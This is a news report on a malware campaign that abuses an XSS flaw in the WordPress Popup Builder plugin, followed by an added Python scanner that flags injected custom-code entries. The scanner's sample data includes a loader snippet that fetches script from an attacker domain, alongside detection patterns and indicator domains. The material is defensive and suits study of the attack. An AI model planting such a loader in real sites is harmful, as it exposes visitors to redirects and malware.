
Hackers Take Advantage of WordPress Plugin Flaws to Infect Over 3,300 Websites with Malware


News, AntaraNews – Hackers have compromised WordPress sites by exploiting a flaw in older versions of the Popup Builder plugin, infecting more than 3,300 sites with malware.

The vulnerability exploited in the attacks is tracked as CVE-2023-6000, a cross-site scripting (XSS) issue that affects Popup Builder version 4.2.3 and older. The flaw was first identified in November 2023.

The Balada Injector campaign uncovered at the beginning of this year exploited this particular flaw to attack more than 6,700 websites, indicating that many website administrators had not applied the patch.

Sucuri now reports that it has detected a new campaign, targeting the same flaw in the WordPress plugin, that has grown significantly over the last three weeks.

According to PublicWWW results, code injections related to this campaign's latest variant are being detected on 329 WordPress websites, and Sucuri's scanners have found 170 malware infections.

Injection details

The malware attacks target the Custom JavaScript and Custom CSS sections of the WordPress administration interface; the malicious code is stored in the database table 'wp_postmeta'.


The main role of the injected code is to act as event handlers for various Popup Builder plugin events, such as 'sgpb-ShouldOpen', 'sgpb-ShouldClose', 'sgpbWillClose' and 'sgpbDidClose'.

In this way the malicious code runs on specific plugin events, such as when a popup is opened or closed.

Sucuri states that the exact behaviour of the malware may vary, but the main goal of the code appears to be redirecting visitors of affected sites to malicious destinations, including phishing pages and malware-dropping websites.

Specifically, in some infections, the analysts observed the code injecting a redirect URL (hxxp://ttincoming.traveltraffic[.]cc/?traffic) into the redirect-url option used to display the "contact-form-7" popup.

The injected code fetches its payload from an external source and inserts it into the page head, where the browser executes it.

In practice, attackers could use this approach for many malicious purposes, some of them more damaging than redirections.

Defending from Hackers

The attacks originate from the domains "ttincoming.traveltraffic[.]cc" and "host.cloudsonicwave[.]com", so blocking these two domains is highly recommended.

If you're running the Popup Builder plugin on your site, you should upgrade to the most recent version, currently 4.2.7, which fixes CVE-2023-6000 as well as other security issues.

WordPress statistics reveal that around 80,000 active sites are still using Popup Builder 4.1 or older, which means the threat remains substantial.

In the event of an infection, removal entails deleting the malicious entries from the Custom Sections of Popup Builder and searching for hidden backdoors to prevent re-infection.
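As an added example (not from the article or from Sucuri), the following script scans wp_postmeta rows and flags Popup Builder custom-code entries that reference the two domains named above or that hook the plugin's popup events together with script-loading or redirect code. The sample rows and the meta_key names are constructed for illustration, not the plugin's real ones.

```python
import re

# Indicator domains named in the article (plain form; refang() normalizes input).
IOC_DOMAINS = ("ttincoming.traveltraffic.cc", "host.cloudsonicwave.com")
# Popup Builder events that the injected handlers hook, as named in the article.
SGPB_EVENTS = ("sgpb-ShouldOpen", "sgpb-ShouldClose", "sgpbWillClose", "sgpbDidClose")
# Constructs a legitimate custom-JS snippet rarely needs inside a popup event handler.
LOADER_PATTERNS = (
    r"createElement\(\s*['\"]script['\"]\s*\)",   # builds a <script> tag
    r"document\.head\.appendChild",               # injects it into the page head
    r"location\.(href|replace)",                   # client-side redirect
)

def refang(value):
    """Normalize defanged text ('[.]', 'hxxp') so indicators match."""
    value = re.sub(r"\[\s*\.\s*\]", ".", value)
    return re.sub(r"hxxp(s?)://", r"http\1://", value, flags=re.I)

def scan_postmeta_row(meta_value):
    """Return the reasons a wp_postmeta value looks injected; empty list = nothing found."""
    text = refang(meta_value)
    reasons = [f"known domain: {d}" for d in IOC_DOMAINS if d in text]
    hooked = [e for e in SGPB_EVENTS if e in text]
    loaders = [p for p in LOADER_PATTERNS if re.search(p, text)]
    if hooked and loaders:
        reasons.append(f"popup event handler {hooked} combined with loader/redirect code")
    return reasons

def scan_rows(rows):
    """rows: iterable of (post_id, meta_key, meta_value). Returns {post_id: [reasons]}."""
    hits = {}
    for post_id, meta_key, meta_value in rows:
        reasons = scan_postmeta_row(meta_value)
        if reasons:
            hits.setdefault(post_id, []).extend(f"{meta_key}: {r}" for r in reasons)
    return hits

# Constructed sample rows; the meta_key names are hypothetical.
SAMPLE_ROWS = [
    (11, "sg_custom_js", "jQuery(window).on('sgpbDidClose', function(){ console.log('closed'); });"),
    (12, "sg_custom_js", "window.addEventListener('sgpb-ShouldOpen', function(){"
        "var s=document.createElement('script');s.src='hxxp://host.cloudsonicwave[.]com/';"
        "document.head.appendChild(s);});"),
    (13, "sg_redirect_url", "hxxp://ttincoming.traveltraffic[.]cc/?traffic"),
]

if __name__ == "__main__":
    for post_id, reasons in scan_rows(SAMPLE_ROWS).items():
        print(post_id, reasons)
```

Against a real site, feed it the output of a query over wp_postmeta rather than the constructed rows, and treat any hit as a lead for the manual cleanup and backdoor hunt described above.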
